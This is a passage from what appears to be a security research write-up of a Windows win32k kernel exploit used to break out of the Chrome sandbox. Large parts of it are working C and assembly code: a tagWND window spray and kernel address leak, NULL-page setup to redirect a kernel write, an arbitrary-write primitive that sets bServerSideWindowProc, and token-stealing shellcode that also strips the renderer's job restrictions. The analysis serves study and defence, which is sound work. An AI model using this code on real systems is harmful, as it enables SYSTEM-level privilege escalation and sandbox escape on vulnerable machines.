Creating an Arbitrary Kernel Address Write Primitive with Window Objects

Once the address of HMValidateHandle() has been obtained, the exploit calls the sprayWindows() function. The first thing sprayWindows() does is register a new window class named sprayWindowClass using RegisterClassExW(). sprayWindowClass is set up such that any windows created with this class use the attacker-defined window procedure sprayCallback().
An HWND array named hwndSprayHandleTable will then be created, and a loop will call CreateWindowExW() to create 0x100 tagWND objects of class sprayWindowClass, saving their handles into hwndSprayHandleTable. Once this spray is complete, two loops will be used, one nested inside the other, to obtain a userland copy of each of the tagWND objects using HMValidateHandle(). The kernel address for each of these tagWND objects is then obtained by examining the tagWND objects' pSelf field. The kernel addresses of the tagWND objects are compared with one another until two tagWND objects are found that are less than 0x3FD00 apart in kernel memory, at which point the loops are terminated.

    /* The following definitions define the various structures needed within sprayWindows() */
    typedef struct _HEAD {
        HANDLE h;
        DWORD cLockObj;
    } HEAD, *PHEAD;

    typedef struct _THROBJHEAD {
        HEAD h;
        PVOID pti;
    } THROBJHEAD, *PTHROBJHEAD;

    typedef struct _THRDESKHEAD {
        THROBJHEAD h;
        PVOID rpdesk;
        PVOID pSelf; // points to the kernel mode address of the object
    } THRDESKHEAD, *PTHRDESKHEAD;

    ....

    // Spray the windows and find two that are less than 0x3fd00 apart in memory.
    if (sprayWindows() == FALSE) {
        printf("[!] Couldn't find two tagWND objects less than 0x3fd00 apart in memory after the spray!\r\n");
        ExitProcess(-1);
    }

    ....

    // Define the HMValidateHandle window type TYPE_WINDOW appropriately.
    #define TYPE_WINDOW 1

    /* Main function for spraying the tagWND objects into memory and finding
       two that are less than 0x3fd00 apart */
    bool sprayWindows() {
        HWND hwndSprayHandleTable[0x100]; // Create a table to hold 0x100 HWND handles created by the spray.

        // Create and set up the window class for the sprayed window objects.
        WNDCLASSEXW sprayClass = { 0 };
        sprayClass.cbSize = sizeof(WNDCLASSEXW);
        sprayClass.lpszClassName = TEXT("sprayWindowClass");
        sprayClass.lpfnWndProc = sprayCallback; // Set the window procedure for the sprayed
                                                // window objects to sprayCallback().
        if (RegisterClassExW(&sprayClass) == 0) {
            printf("[!] Couldn't register the sprayClass class!\r\n");
        }

        // Create 0x100 windows using the sprayClass window class with the window name "spray".
        for (int i = 0; i < 0x100; i++) {
            hwndSprayHandleTable[i] = CreateWindowExW(0, sprayClass.lpszClassName, TEXT("spray"), 0,
                CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, NULL, NULL, NULL, NULL);
        }

        // For each entry in the hwndSprayHandleTable array...
        for (int x = 0; x < 0x100; x++) {

            // Leak the kernel address of the current HWND being examined, save it into firstEntryAddress.
            THRDESKHEAD *firstEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[x], TYPE_WINDOW);
            unsigned int firstEntryAddress = (unsigned int)firstEntryDesktop->pSelf;

            // Then start a loop to compare the kernel address of this hWND
            // object to the kernel address of every other hWND object...
            for (int y = 0; y < 0x100; y++) {
                if (x != y) { // Skip over one iteration of the loop if the entries being
                              // compared are at the same offset in hwndSprayHandleTable.

                    // Leak the kernel address of the second hWND object being used in
                    // the comparison, save it into secondEntryAddress.
                    THRDESKHEAD *secondEntryDesktop = (THRDESKHEAD *)pHmValidateHandle(hwndSprayHandleTable[y], TYPE_WINDOW);
                    unsigned int secondEntryAddress = (unsigned int)secondEntryDesktop->pSelf;

                    // If the kernel address of the hWND object leaked earlier in the code is greater than
                    // the kernel address of the hWND object leaked above, execute the following code.
                    if (firstEntryAddress > secondEntryAddress) {

                        // Check if the difference between the two addresses is less than 0x3fd00.
                        if ((firstEntryAddress - secondEntryAddress) < 0x3fd00) {
                            printf("[*] Primary window address: 0x%08X\r\n", secondEntryAddress);
                            printf("[*] Secondary window address: 0x%08X\r\n", firstEntryAddress);

                            // Save the handle of secondEntryAddress into hPrimaryWindow
                            // and its address into primaryWindowAddress.
                            hPrimaryWindow = hwndSprayHandleTable[y];
                            primaryWindowAddress = secondEntryAddress;

                            // Save the handle of firstEntryAddress into hSecondaryWindow
                            // and its address into secondaryWindowAddress.
                            hSecondaryWindow = hwndSprayHandleTable[x];
                            secondaryWindowAddress = firstEntryAddress;

                            // Windows have been found, escape the loop.
                            break;
                        }
                    }

                    // If the kernel address of the hWND object leaked earlier in the code is less than
                    // the kernel address of the hWND object leaked above, execute the following code.
                    else {

                        // Check if the difference between the two addresses is less than 0x3fd00.
                        if ((secondEntryAddress - firstEntryAddress) < 0x3fd00) {
                            printf("[*] Primary window address: 0x%08X\r\n", firstEntryAddress);
                            printf("[*] Secondary window address: 0x%08X\r\n", secondEntryAddress);

                            // Save the handle of firstEntryAddress into hPrimaryWindow
                            // and its address into primaryWindowAddress.
                            hPrimaryWindow = hwndSprayHandleTable[x];
                            primaryWindowAddress = firstEntryAddress;

                            // Save the handle of secondEntryAddress into hSecondaryWindow
                            // and its address into secondaryWindowAddress.
                            hSecondaryWindow = hwndSprayHandleTable[y];
                            secondaryWindowAddress = secondEntryAddress;

                            // Windows have been found, escape the loop.
                            break;
                        }
                    }
                }
            }

            // Check if the inner loop ended because the windows were found. If so, print a debug message.
            // Otherwise continue on to the next object in the hwndSprayHandleTable array.
            if (hPrimaryWindow != NULL) {
                printf("[*] Found target windows!\r\n");
                break;
            }
        }

Once two tagWND objects matching these requirements are found, their addresses are compared to see which one is located earlier in memory. The tagWND object located earlier in memory becomes the primary window; its address is saved into the global variable primaryWindowAddress, whilst its handle is saved into the global variable hPrimaryWindow.
The other tagWND object becomes the secondary window; its address is saved into secondaryWindowAddress and its handle is saved into hSecondaryWindow. Once the addresses of these windows have been saved, the handles to the other windows within hwndSprayHandleTable are destroyed using DestroyWindow() in order to release resources back to the host operating system.

        // Check that hPrimaryWindow isn't NULL after both of the loops are
        // complete. This will only occur in the event that none of the 0x100
        // window objects were within 0x3fd00 bytes of each other. If this occurs, then bail.
        if (hPrimaryWindow == NULL) {
            printf("[!] Couldn't find the right windows for the tagWND primitive. Exiting....\r\n");
            return FALSE;
        }

        // This loop will destroy the handles to all other
        // windows besides hPrimaryWindow and hSecondaryWindow,
        // thereby ensuring that there are no lingering unused
        // handles wasting system resources.
        for (int p = 0; p < 0x100; p++) {
            HWND temp = hwndSprayHandleTable[p];
            if ((temp != hPrimaryWindow) && (temp != hSecondaryWindow)) {
                DestroyWindow(temp);
            }
        }

        addressToWrite = (UINT)primaryWindowAddress + 0x90; // Set addressToWrite to
                                                            // primaryWindow's cbwndExtra field.
        printf("[*] Destroyed spare windows!\r\n");

        // Check if it's possible to set the window text in hSecondaryWindow.
        // If this isn't possible, there is a serious error, and the program should exit.
        // Otherwise return TRUE, as everything has been set up correctly.
        if (SetWindowTextW(hSecondaryWindow, L"test String") == 0) {
            printf("[!] Something is wrong, couldn't initialize the text buffer in the secondary window....\r\n");
            return FALSE;
        }
        else {
            return TRUE;
        }

The final part of sprayWindows() sets addressToWrite to the address of the cbwndExtra field within primaryWindowAddress in order to let the exploit know where the limited write primitive should write the value 0x40000000 to.
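The pairing logic inside sprayWindows() can be modeled as a simple nested search over the leaked pSelf values. The sketch below uses fabricated kernel addresses purely for illustration; it mirrors the exploit's selection of a "primary" (lower in memory) and "secondary" (higher in memory) window under the 0x3FD00 threshold.

```python
# Illustrative model of the pairwise proximity search in sprayWindows().
# Given the leaked pSelf kernel addresses of the sprayed tagWND objects,
# find two that are less than 0x3FD00 bytes apart, ordered so that the
# "primary" window is the one lower in memory. Addresses are made up.

THRESHOLD = 0x3FD00

def find_adjacent_pair(addresses):
    """Return (primary, secondary) with primary < secondary and
    secondary - primary < THRESHOLD, or None if no such pair exists."""
    for x, first in enumerate(addresses):
        for y, second in enumerate(addresses):
            if x == y:
                continue  # skip comparing an entry with itself
            lo, hi = min(first, second), max(first, second)
            if hi - lo < THRESHOLD:
                return lo, hi
    return None

leaked = [0xFE8A0000, 0xFE010000, 0xFE8C1000, 0xFD900000]
pair = find_adjacent_pair(leaked)
```

Here 0xFE8A0000 and 0xFE8C1000 are only 0x21000 bytes apart, so they are chosen; all other pairings exceed the threshold.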
To understand why tagWND objects were sprayed and why the cbwndExtra and strName.Buffer fields of a tagWND object are important, it is necessary to examine a well-known kernel write primitive that exists on Windows versions prior to Windows 10 RS1. As is explained in Saif Sheri and Ian Kronquist's The Life & Death of Kernel Object Abuse paper and Morten Schenk's Taking Windows 10 Kernel Exploitation to The Next Level presentation, if one can place two tagWND objects adjacent to one another in memory and then edit the cbwndExtra field of the tagWND object located earlier in memory via a kernel write vulnerability, one can extend the expected length of the former tagWND's WndExtra data field such that it thinks it controls memory that is actually owned by the second tagWND object.

The following diagram shows how the exploit utilizes this concept to set the cbwndExtra field of hPrimaryWindow to 0x40000000 by utilizing the limited write primitive that was explained earlier in this blog post, as well as how this adjustment allows the attacker to set data inside the second tagWND object that is located adjacent to it.

Effects of adjusting the cbwndExtra field in hPrimaryWindow

Once the cbwndExtra field of the first tagWND object has been overwritten, calling SetWindowLong() on the first tagWND object allows the attacker to overwrite the strName.Buffer field in the second tagWND object and set it to an arbitrary address. When SetWindowText() is then called on the second tagWND object, the address contained in the overwritten strName.Buffer field is used as the destination address for the write operation. By forming this stronger write primitive, the attacker can write controllable values to kernel addresses, which is a prerequisite to breaking out of the Chrome sandbox. The following listing from WinDBG shows the fields of the tagWND object which are relevant to this technique.
    1: kd> dt -r1 win32k!tagWND
       +0x000 head             : _THRDESKHEAD
          +0x000 h                : Ptr32 Void
          +0x004 cLockObj         : Uint4B
          +0x008 pti              : Ptr32 tagTHREADINFO
          +0x00c rpdesk           : Ptr32 tagDESKTOP
          +0x010 pSelf            : Ptr32 UChar
       ...
       +0x084 strName          : _LARGE_UNICODE_STRING
          +0x000 Length           : Uint4B
          +0x004 MaximumLength    : Pos 0, 31 Bits
          +0x004 bAnsi            : Pos 31, 1 Bit
          +0x008 Buffer           : Ptr32 Uint2B
       +0x090 cbwndExtra       : Int4B
       ...

Leaking the Address of pPopupMenu for Write Address Calculations

Before continuing, let's reexamine how MNGetpItemFromIndex(), which returns the address to be written to, minus an offset of 0x4, operates. Recall that the decompiled version of this function is as follows.

    tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
    {
      tagITEM *result; // eax

      if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL.
        result = 0;
      else
        result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
      return result;
    }

Notice that on line 8 there are two components which make up the final address which is returned: pPopupMenu, which is multiplied by 0x6C, and spMenu->rgItems, which is read from offset 0x34 in the NULL page (since spMenu is NULL). Without the ability to determine the values of both of these items, the attacker cannot fully control which address is returned by MNGetpItemFromIndex(), and consequently which address xxxMNSetGapState() writes to in memory.

There is a solution for this, however, which can be observed in the updates made to the code for SubMenuProc(). The updated code takes the wParam parameter and adds 0x10 to it to obtain the value of pPopupMenu. This is then used to set the value of the variable addressToWriteTo, which in turn sets the value of spMenu->rgItems within MNGetpItemFromIndex() so that it returns the correct address for xxxMNSetGapState() to write to.
    LRESULT WINAPI SubMenuProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
    {
        if (msg == WM_MN_FINDMENUWINDOWFROMPOINT)
        {
            printf("[*] In WM_MN_FINDMENUWINDOWFROMPOINT handler...\r\n");
            printf("[*] Restoring window procedure...\r\n");
            SetWindowLongPtr(hwnd, GWLP_WNDPROC, (ULONG)DefWindowProc);

            /* The wParam parameter here has the same value as pPopupMenu inside
               MNGetpItemFromIndex, except wParam has had 0x10 subtracted from it.
               The code adjusts this below to accommodate. This is an important
               information leak, as without it the attacker cannot manipulate the
               values returned from MNGetpItemFromIndex, which can result in kernel
               crashes and a dramatic decrease in exploit reliability. */
            UINT pPopupAddressInCalculations = wParam + 0x10;

            // Set the address to write to to be the right bit of cbwndExtra in the target tagWND.
            UINT addressToWriteTo = ((addressToWrite + 0x6C) - ((pPopupAddressInCalculations * 0x6C) + 0x4));

To understand why this code works, it is necessary to reexamine the code for xxxMNFindWindowFromPoint(). Note that the address of pPopupMenu is sent by xxxMNFindWindowFromPoint() in the wParam parameter when it calls xxxSendMessage() to send a MN_FINDMENUWINDOWFROMPOINT message to the application's main window. This allows the attacker to obtain the address of pPopupMenu by implementing a handler for MN_FINDMENUWINDOWFROMPOINT which saves the wParam parameter's value into a local variable for later use.

    LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
    {
    ....
      v6 = xxxSendMessage(
             var_pPopupMenu->spwndNextPopup,
             MN_FINDMENUWINDOWFROMPOINT,
             (WPARAM)&pPopupMenu,
             (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16));
                                        // Make the MN_FINDMENUWINDOWFROMPOINT usermode callback
                                        // using the address of pPopupMenu as the wParam argument.
      ThreadUnlock1();
      if ( IsMFMWFPWindow(v6) )         // Validate that the handle returned from the user
                                        // mode callback is a handle to a MFMWFP window.
        v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW);
                                        // Validate that the returned handle is a handle to
                                        // a window object. Set v1 to TRUE if all is good.
    ...

During experiments, it was found that the value sent via xxxSendMessage() is 0x10 less than the value used in MNGetpItemFromIndex(). For this reason, the exploit code adds 0x10 to the value returned from xxxSendMessage() to ensure that the value of pPopupMenu in the exploit code matches the value used inside MNGetpItemFromIndex().

Setting up the Memory in the NULL Page

Once addressToWriteTo has been calculated, the NULL page is set up. In order to set up the NULL page appropriately, the following offsets need to be filled out:

0x20
0x34
0x4C
0x50 to 0x1050

This can be seen in more detail in the following diagram.

NULL page utilization

The exploit code starts by setting offset 0x20 in the NULL page to 0xFFFFFFFF. This is done because spMenu will be NULL at this point, so spMenu->cItems will contain the value at offset 0x20 of the NULL page. Setting the value at this address to a large unsigned integer ensures that spMenu->cItems is greater than the value of pPopupMenu, which prevents MNGetpItemFromIndex() from returning 0 instead of result. This can be seen on line 5 of the following code.

    tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
    {
      tagITEM *result; // eax

      if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur here if spMenu is NULL.
        result = 0;
      else
        result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
      return result;
    }

Offset 0x34 of the NULL page will contain a DWORD which holds the value of spMenu->rgItems. This will be set to the value of addressToWriteTo so that the calculation shown on line 8 will set result to the address of primaryWindow's cbwndExtra field, minus an offset of 0x4. The other offsets require a more detailed explanation.
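As a quick aside, the addressToWriteTo formula above can be checked numerically. The model below uses made-up 32-bit example values; it shows that once rgItems (NULL-page offset 0x34) holds addressToWriteTo, MNGetpItemFromIndex() returns a pointer such that the two OR-writes later performed by xxxMNSetGapState() (at result + 0x4 and at (result - 0x6C) + 0x4, per its decompiled code shown later in the post) land at addressToWrite + 0x6C and exactly at addressToWrite, the cbwndExtra field.

```python
# Numeric check of the addressToWriteTo arithmetic. All concrete values
# are fabricated; arithmetic is masked to 32 bits to mimic unsigned
# integer wraparound in the kernel's pointer math.

MASK32 = 0xFFFFFFFF

def address_to_write_to(address_to_write, p_popup):
    # The handler first adds 0x10 to wParam to recover pPopupMenu.
    return ((address_to_write + 0x6C) - ((p_popup * 0x6C) + 0x4)) & MASK32

def mn_get_p_item_from_index(rg_items, p_popup):
    # result = spMenu->rgItems + 0x6C * pPopupMenu
    return (rg_items + 0x6C * p_popup) & MASK32

addressToWrite = 0xFE8A0090            # primaryWindow's cbwndExtra field
pPopupMenu = 0x04050010                # leaked wParam + 0x10
rgItems = address_to_write_to(addressToWrite, pPopupMenu)
result = mn_get_p_item_from_index(rgItems, pPopupMenu)

first_write  = (result + 0x4) & MASK32         # target of |= 0x80000000
second_write = (result - 0x6C + 0x4) & MASK32  # target of |= 0x40000000
```

The pPopupMenu terms cancel algebraically, so the 0x40000000 write always lands on cbwndExtra regardless of the leaked pPopupMenu value.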
The following code shows the code within the function xxxMNUpdateDraggingInfo() which utilizes these offsets.

    .text:BF975EA3    mov     eax, [ebx+14h]        ; EAX = ppopupmenu->spmenu
                                                    ; Should set EAX to 0 or NULL.
    .text:BF975EA6    push    dword ptr [eax+4Ch]   ; uIndex aka pPopupMenu. This will be the
                                                    ; value at address 0x4C given that
                                                    ; ppopupmenu->spmenu is NULL.
    .text:BF975EA9    push    eax                   ; spMenu. Will be NULL or 0.
    .text:BF975EAA    call    MNGetpItemFromIndex
    ..............
    .text:BF975EBA    add     ecx, [eax+28h]        ; ECX += pItemFromIndex->yItem
                                                    ; pItemFromIndex->yItem will be the value
                                                    ; at offset 0x28 of whatever value
                                                    ; MNGetpItemFromIndex returns.
    ...............
    .text:BF975ECE    cmp     ecx, ebx
    .text:BF975ED0    jg      short loc_BF975EDB    ; Jump to loc_BF975EDB if the following
                                                    ; condition is true:
                                                    ;
                                                    ; ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))

As can be seen above, a call is made to MNGetpItemFromIndex() using two parameters: spMenu, which will be set to a value of NULL, and uIndex, which will contain the DWORD at offset 0x4C of the NULL page. The value returned by MNGetpItemFromIndex() is then incremented by 0x28 before being used as a pointer to a DWORD. The DWORD at the resulting address is used to set pItemFromIndex->yItem, which is utilized in a calculation that determines whether a jump should be taken.

The exploit needs to ensure that this jump is always taken, as this guarantees that xxxMNSetGapState() goes about writing to addressToWrite in a consistent manner. To ensure the jump is taken, the exploit sets the value at offset 0x4C in such a way that MNGetpItemFromIndex() will always return a value within the range 0x120 to 0x180.
By then setting the bytes from offset 0x50 to 0x1050 within the NULL page to 0xF0, the attacker can ensure that regardless of the value that MNGetpItemFromIndex() returns, when it is incremented by 0x28 and used as a pointer to a DWORD it will result in pItemFromIndex->yItem being set to 0xF0F0F0F0. This causes the first half of the following calculation to always be a very large unsigned integer, so the jump will always be taken.

    ((pMenuState->ptMouseLast.y - pMenuState->uDraggingHitArea->rcClient.top) + pItemFromIndex->yItem) > (pItem->yItem + SYSMET(CYDRAG))

Forming a Stronger Write Primitive by Using the Limited Write Primitive

Once the NULL page has been set up, SubMenuProc() will return hWndFakeMenu to xxxSendMessage() in xxxMNFindWindowFromPoint(), where execution will continue.

        memset((void *)0x50, 0xF0, 0x1000);
        return (ULONG)hWndFakeMenu;

After the xxxSendMessage() call, xxxMNFindWindowFromPoint() will call HMValidateHandleNoSecure() to ensure that hWndFakeMenu is a handle to a window object. This code can be seen below.

      v6 = xxxSendMessage(
             var_pPopupMenu->spwndNextPopup,
             MN_FINDMENUWINDOWFROMPOINT,
             (WPARAM)&pPopupMenu,
             (unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16));
                                        // Make the MN_FINDMENUWINDOWFROMPOINT usermode callback
                                        // using the address of pPopupMenu as the wParam argument.
      ThreadUnlock1();
      if ( IsMFMWFPWindow(v6) )         // Validate that the handle returned from the user
                                        // mode callback is a handle to a MFMWFP window.
        v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW);
                                        // Validate that the returned handle is a handle to
                                        // a window object. Set v1 to TRUE if all is good.

If hWndFakeMenu is deemed to be a valid handle to a window object, then xxxMNSetGapState() will be executed, which will set the cbwndExtra field in primaryWindow to 0x40000000, as shown below.
This will allow SetWindowLong() calls that operate on primaryWindow to set values beyond the normal boundaries of primaryWindow's WndExtra data field, thereby allowing primaryWindow to make controlled writes to data within secondaryWindow.

    void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
    {
    ...
      var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write
                                                     // operation should occur, minus an
                                                     // offset of 0x4.
      temp_var_PITEM = var_PITEM;
      if ( var_PITEM )
      {
    ...
        var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1);
                                                     // Get the address where the second write
                                                     // operation should occur, minus an offset
                                                     // of 0x4. This address will be 0x6C bytes
                                                     // earlier in memory than the address in
                                                     // var_PITEM.
        if ( fSet )
        {
          *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the
                                                         // attacker controlled address.
          if ( var_PITEM_Minus_Offset_Of_0x6C )
          {
            *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;
                                                         // Conduct the second write to the attacker
                                                         // controlled address minus 0x68 (0x6C-0x4).

Once the kernel write operation within xxxMNSetGapState() is finished, the undocumented window message 0x1E5 will be sent. The updated exploit catches this message in the following code.

    else {
        if ((cwp->message == 0x1E5)) {
            UINT offset = 0; // Create the offset variable which will hold the offset from the
                             // start of hPrimaryWindow's cbwnd data field to write to.

            UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0);
                             // Set addressOfStartofPrimaryWndCbWndData to the address of
                             // the start of hPrimaryWindow's cbwnd data field.

            // Set offset to the difference between hSecondaryWindow's
            // strName.Buffer's memory address and the address of
            // hPrimaryWindow's cbwnd data field.
            offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);
            printf("[*] Offset: 0x%08X\r\n", offset);

            // Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16),
            // or the address of the bServerSideWindowProc bit.
            if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {
                printf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());
                ExitProcess(-1);
            }
            else {
                printf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));
            }

This code starts by checking whether the window message was 0x1E5. If it was, the code calculates the distance between the start of primaryWindow's wndExtra data section and the location of secondaryWindow's strName.Buffer pointer. The difference between these two locations is saved into the variable offset. Once this is done, SetWindowLongA() is called using hPrimaryWindow and the offset variable to set secondaryWindow's strName.Buffer pointer to the address of secondaryWindow's bServerSideWindowProc field. The effect of this operation can be seen in the diagram below.

Using SetWindowLong() to change secondaryWindow's strName.Buffer pointer

By performing this action, when SetWindowText() is called on secondaryWindow, it will use its overwritten strName.Buffer pointer to determine where the write should be conducted, which will result in secondaryWindow's bServerSideWindowProc flag being overwritten if an appropriate value is supplied as the lpString argument to SetWindowText().
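The offset handed to SetWindowLongA() can likewise be verified with plain arithmetic. In the sketch below (fabricated addresses again), the wndExtra data of the primary tagWND starts at primaryWindowAddress + 0xB0, and the secondary tagWND's strName.Buffer pointer sits at secondaryWindowAddress + 0x8C (strName at +0x84 plus the Buffer member at +0x8 within _LARGE_UNICODE_STRING).

```python
# Model of the 0x1E5 handler's offset computation: a call to
# SetWindowLongA(hPrimaryWindow, offset, value) writes `value` at
# (primaryWindowAddress + 0xB0) + offset, which should coincide with
# secondaryWindow's strName.Buffer slot. Addresses are made up.

def strname_buffer_offset(primary, secondary):
    cbwnd_data_start = primary + 0xB0   # start of primary's wndExtra data
    strname_buffer = secondary + 0x8C   # secondary's strName.Buffer slot
    return strname_buffer - cbwnd_data_start

primary = 0xFE8A0000
secondary = 0xFE8C1000
offset = strname_buffer_offset(primary, secondary)
write_target = (primary + 0xB0) + offset
```

Because the two windows are less than 0x3FD00 apart, the offset stays well inside the faked 0x40000000-byte cbwndExtra bound, so the kernel's SetWindowLong bounds check passes.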
Abusing the tagWND Write Primitive to Set the bServerSideWindowProc Bit

Once the strName.Buffer field within secondaryWindow has been set to the address of secondaryWindow's bServerSideWindowProc flag, SetWindowText() is called with an hWnd parameter of hSecondaryWindow and an lpString value of "\x06" in order to enable the bServerSideWindowProc flag in secondaryWindow.

    // Write the value \x06 to the address pointed to by hSecondaryWindow's strName.Buffer
    // field to set the bServerSideWindowProc bit in hSecondaryWindow.
    if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
        printf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
        ExitProcess(-1);
    }
    else {
        printf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));
    }

The following diagram shows what secondaryWindow's tagWND layout looks like before and after the SetWindowTextA() call.

Setting the bServerSideWindowProc flag in secondaryWindow with SetWindowText()

Setting the bServerSideWindowProc flag ensures that secondaryWindow's window procedure, sprayCallback(), will now run in kernel mode with SYSTEM-level privileges, rather than in user mode like most other window procedures. This is a popular vector for privilege escalation and has been used in many attacks, such as a 2017 attack by the Sednit APT group. The following diagram illustrates this in more detail.

Effect of setting bServerSideWindowProc

Stealing the Process Token and Removing the Job Restrictions

Once the call to SetWindowTextA() is completed, a WM_ENTERIDLE message is sent to hSecondaryWindow, as can be seen in the following code.

    printf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
    SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
    if (success == TRUE) {
        printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
    }
    else {
        printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
        ExitProcess(-1);
    }

The WM_ENTERIDLE message will then be picked up by secondaryWindow's window procedure sprayCallback(). The code for this function can be seen below.

    // Tons of thanks go to https://github.com/jvazquez-r7/MS15-061/blob/first_fix/ms15-061.cpp for
    // additional insight into how this function should operate. Note that a token stealing shellcode
    // is called here only because trying to spawn processes or do anything complex as SYSTEM
    // often resulted in APC_INDEX_MISMATCH errors and a kernel crash.
    LRESULT CALLBACK sprayCallback(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
    {
        if (uMsg == WM_ENTERIDLE)
        {
            WORD um = 0;
            __asm
            {
                // Grab the value of the CS register and
                // save it into the variable um.
                mov ax, cs
                mov um, ax
            }
            // If um is 0x1B, this function is executing in user mode
            // and something went wrong. Therefore output a message that
            // the exploit didn't succeed and bail.
            if (um == 0x1b)
            {
                // USER MODE
                printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
                ExitProcess(-1); // Bail, as if this code is hit either the target isn't
                                 // vulnerable or something is wrong with the exploit.
            }
            else
            {
                success = TRUE; // Set the success flag to indicate the sprayCallback()
                                // window procedure is running as SYSTEM.
                Shellcode();    // Call the Shellcode() function to perform the token stealing and
                                // to remove the Job object on the Chrome renderer process.
            }
        }
        return DefWindowProc(hWnd, uMsg, wParam, lParam);
    }

As the bServerSideWindowProc flag has been set in secondaryWindow's tagWND object, sprayCallback() should now be running as the SYSTEM user. The sprayCallback() function first checks that the incoming message is a WM_ENTERIDLE message. If it is, inline assembly reads the CS register to verify that sprayCallback() is indeed being run in kernel mode as the SYSTEM user.
If this check passes, the boolean success is set to TRUE to indicate that the exploit succeeded, and the function Shellcode() is executed. Shellcode() performs a simple token stealing exploit using the shellcode shown on abatchy's blog post, with two slight modifications which have been highlighted in the code below.

    // Taken from https://www.abatchy.com/2018/01/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1.
    // Essentially a standard token stealing shellcode, with two lines
    // added to remove the Job object associated with the Chrome
    // renderer process.
    __declspec(noinline) int Shellcode()
    {
        __asm {
            xor eax, eax                        // Set EAX to 0.
            mov eax, DWORD PTR fs:[eax + 0x124] // Get nt!_KPCR.PcrbData.
                                                // _KTHREAD is located at FS:[0x124]
            mov eax, [eax + 0x50]               // Get nt!_KTHREAD.ApcState.Process
            mov ecx, eax                        // Copy current process _EPROCESS structure
            xor edx, edx                        // Set EDX to 0.
            mov DWORD PTR [ecx + 0x124], edx    // Set the Job pointer in the _EPROCESS structure to NULL.
            mov edx, 0x4                        // Windows 7 SP1 SYSTEM process PID = 0x4

        SearchSystemPID:
            mov eax, [eax + 0B8h]               // Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, 0B8h
            cmp [eax + 0B4h], edx               // Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID

            mov edx, [eax + 0xF8]               // Get SYSTEM process nt!_EPROCESS.Token
            mov [ecx + 0xF8], edx               // Assign SYSTEM process token.
        }
    }

The modification takes the _EPROCESS structure for the Chrome renderer process and NULLs out its Job pointer. This is done because during experiments it was found that even if the shellcode stole the SYSTEM token, this token would still inherit the job object of the Chrome renderer process, preventing the exploit from being able to spawn any child processes. NULLing out the Job pointer within the Chrome renderer process prior to changing the Chrome renderer process's token removes the job restrictions from both the Chrome renderer process and any tokens that later get assigned to it, preventing this from happening.
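The logic of the modified shellcode can be illustrated with a toy model. The sketch below mocks _EPROCESS entries as dictionaries (the field names and the integer "links" are simplifications, not real structure offsets): it NULLs the current process's Job pointer, walks the process list until it finds PID 4, and copies that process's token, just as the assembly above does.

```python
# Toy model of the token-stealing walk: follow ActiveProcessLinks.Flink
# from the current process until UniqueProcessId == 4 (SYSTEM on
# Windows 7), then copy its Token and NULL the current Job pointer.
# All structures, PIDs, and token values here are fabricated.

SYSTEM_PID = 4

def steal_token(current, processes):
    current["Job"] = None             # drop the job restrictions first
    p = current
    while p["Pid"] != SYSTEM_PID:     # walk the circular Flink list
        p = processes[p["Flink"]]
    current["Token"] = p["Token"]     # assign the SYSTEM token
    return current

procs = {
    0: {"Pid": 4,     "Token": "SYSTEM-token", "Job": None,  "Flink": 1},
    1: {"Pid": 0xF30, "Token": "user-token",   "Job": None,  "Flink": 2},
    2: {"Pid": 0xC54, "Token": "low-token",    "Job": "job", "Flink": 0},
}
chrome = steal_token(procs[2], procs)
```

Note that the model NULLs the Job pointer before the token swap, mirroring the ordering in the shellcode that keeps the newly assigned token free of the renderer's job restrictions.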
